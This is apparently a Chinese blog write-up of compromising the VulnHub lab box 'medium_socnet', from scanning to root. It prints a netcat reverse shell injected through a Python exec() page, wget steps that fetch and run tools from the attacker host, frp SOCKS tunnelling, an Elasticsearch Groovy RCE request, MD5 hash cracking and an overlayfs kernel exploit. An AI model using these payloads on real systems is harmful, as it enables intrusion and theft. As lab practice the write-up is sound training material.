medium_socnet

从学长那里薅来的靶机,说是基于docker的,挺有意思,那必须搞一下呀!(后面百度才知道这玩意是vulnhub上面的)

0x01 信息收集一、主机扫描

还是老规矩,nmap扫一手。

发现192.168.56.101主机,而且22和5000端口是开着的。
访问一下5000端口看看

有个输入框,输入内容就会回显,这里我尝试丢个弹窗发现会被转义

alert(1)


暂时不知道有啥用。

二、遍历目录

dirsearch扫一下

dirsearch -u http://192.168.56.101:5000/


有一个admin目录,访问一下

根据页面的提示,说是有一个exec()函数可以执行,叫我们输入代码。这里不清楚是哪种语言的exec函数,于是就都试了一下。最后确定了是python代码。

但是这里没有回显,就只是Ran the code这句话,尝试弹个shell看看。

0x02 docker1

在本地开启终端监听2333端口

nc -lvvp 2333

然后回到刚刚的输入框,输入如下代码反弹shell

__import__('os').popen("nc 192.168.56.1 2333 -e /bin/bash")

注意:这里为什么不用system函数,是因为没办法反弹shell,于是想到了还有一个popen函数可以;还有就是不能用/bin/bash,原因是当前用户主机上没有这个命令,只能用/bin/sh

成功getshell!

0x03 内网穿透

相信都可以看到,当前目录有一个Dockerfile文件,这说明当前所处的环境是在docker里的,所以战斗还没结束,才刚刚开始呢。
查看一下当前的ip

eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:03          inet addr:172.17.0.3  Bcast:172.17.255.255  Mask:255.255.0.0          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:56753 errors:0 dropped:0 overruns:0 frame:0          TX packets:56729 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0          RX bytes:7008504 (6.6 MiB)  TX bytes:7519009 (7.1 MiB)lo        Link encap:Local Loopback          inet addr:127.0.0.1  Mask:255.0.0.0          UP LOOPBACK RUNNING  MTU:65536  Metric:1          RX packets:0 errors:0 dropped:0 overruns:0 frame:0          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

很明显,172.17.0.3 是一个内网的ip,这对我第一次做这种主机感觉很有意思,不用很多台主机,却能构造一个类内网的环境,瞬间激起了我的兴趣。接下里可以把这台主机当作内网来打了。

一、内网信息收集

先查看一下当前的用户权限

ok,root权限,无所畏惧。cd到tmp目录下,上传fscan扫一波。
在fscan所在的目录开启python的http服务

python -m http.server


然后在目标主机执行命令

wget http://192.168.56.1:8000/fscanchmod 777 fscan./fscan -h 172.17.0.3/24

fscan扫描的结果如下

存在三台主机(暂且说成主机),172.17.0.3是当前这台。172.17.0.1开着22端口,暂时没法利用。172.17.0.2开启着9200端口,可以选择从这台入手。

二、代理转发

现在的问题是172.17.0.2我无法访问,需要做一下socks代理。
首先先编辑一下frpc.ini文件

[common]server_addr = 192.168.56.1server_port = 7777[socks5]type = tcpplugin = socks5remote_port = 6666

然后编辑frps.ini

[common]bind_addr = 0.0.0.0bind_port = 7777

现在同样需要开启python的http服务,然后进入目标主机的/tmp目录下上传frpcfrpc.ini文件。

cd /tmpwget http://192.168.56.1:8000/frpcwget http://192.168.56.1:8000/frpc.inichmod 777 frpc

然后在本地运行frps(这里是windows环境)

frps.exe -c frps.ini


然后再在目标主机上执行

./frpc -c frpc.ini

像这种就算成功连接

接下来还需要一个重要角色——proxifier,我承认他确实好用哈哈。
需要先配置一下代理服务器,地址就是本地ip,然后端口是刚刚在frpc.ini设置的6666端口。

配置完后ok就可以了,然后浏览器访问172.17.0.2:9200

成功访问!

0x04 docker2

从页面可以看出这应该是一个api,这个elasticsearch有点眼熟啊,这里有他的版本4.10.2,百度一手。

{  "status" : 200,  "name" : "Boomer",  "cluster_name" : "elasticsearch",  "version" : {    "number" : "1.4.2",    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",    "build_timestamp" : "2014-12-16T14:11:12Z",    "build_snapshot" : false,    "lucene_version" : "4.10.2"  },  "tagline" : "You Know, for Search"}

百度说的是存在命令执行漏洞,也就是rce,找了一个poc,抓个包看看能不能用。

POST /_search?pretty HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 156{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

这里也是顺利执行了,而且是root权限,省的我提权了哈哈。

那么第二台也是被拿下(这里我不会反弹shell,因为他上面没有nc,用bash也弹不了,就没有再试了,应该是有办法可以反弹的,当时没有多想)。
第二台同样也是docker环境

0x05 宿主机

可以看到根目录下有一个passwords文件

于是获取一下内容,内容如下

Format: number,number,number,number,lowercase,lowercase,lowercase,lowercaseExample: 1234abcdjohn:3f8184a7343664553fcb5337a3138814 test:861f194e9d6118f3d942a72be3e51749admin:670c3bbc209a18dde5446e5e6c1f1d5broot:b3d34352fc26117979deabdf1b9b6354jane:5c158b60ed97c723b673529b8a3cf72b

欸,这我可能会想到这账户密码万一是第三台的ssh的账户密码呢?于是马不停蹄的md5解一下密。

john:1337hacktest:1234testadmin:1111passroot:1234passjane:1234jane"

接下里就是一个一个试呗。这里试出来是john,哎root还是差点啊~

0x06 提升权限

查看一下ip

docker0   Link encap:Ethernet  HWaddr 02:42:4e:92:81:cd          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0          inet6 addr: fe80::42:4eff:fe92:81cd/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:69070 errors:0 dropped:0 overruns:0 frame:0          TX packets:66850 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0          RX bytes:7609931 (7.6 MB)  TX bytes:27188443 (27.1 MB)eth0      Link encap:Ethernet  HWaddr 08:00:27:a6:e2:ec          inet addr:192.168.56.101  Bcast:192.168.56.255  Mask:255.255.255.0          inet6 addr: fe80::a00:27ff:fea6:e2ec/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:82567 errors:0 dropped:0 overruns:0 frame:0          TX packets:64591 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000          RX bytes:34336325 (34.3 MB

ok,这才是真正的宿主机,现在不在docker内了。
查看一下宿主机的版本,看看有没有什么内核漏洞

uname -a

这个版本有点老,应该是有漏洞的,去kali里找找看。

searchsploit linux 3.13.0

这里是有一个特别明显的漏洞

overlayfs这个应该是可以利用的,把脚本放到当前目录

searchsploit -m linux/local/37292.cvim 37292.c

到这里我就不太会了,也是看了一下网上的wp才明白的。
是这样的,这个代码没有问题,但是需要删掉几个地方,红框里的都是需要删除的

因为他代码里要编译ofs-lib.c,但是ofs-lib.c文件这里没有,而kali有现成的ofs-lib.so文件,所以思路就是删除它编译的那段代码,然后把ofs-lib.so文件连同编译好的37292.c文件上传到目标主机。
定位到kali上的ofs-lib.so文件

locate ofs-lib.so

然后编译37292.c文件

gcc 37292.c

ok,准备工作都做完了,接下来上传文件(a.out就是编译后的可执行文件)

cd /tmpwget http://192.168.56.1:8000/ofs-lib.sohttp://192.168.56.1:8000/a.outchmod 777 a.out./a.out

但是他这里报错啊,说是没有指定的链接库。没关系,我这里有Ubuntu 16可以用,低版本编译总不会报错吧(后面再学习怎么用指定的链接库链接,我太菜了呜呜呜)
编译成功后重新上传执行

成功!完结撒花!

0x07

不容易呀打这台主机,不过是真有意思,就是最后那里提权有点搞人心态哈哈。但是确实也是学到了很多东西。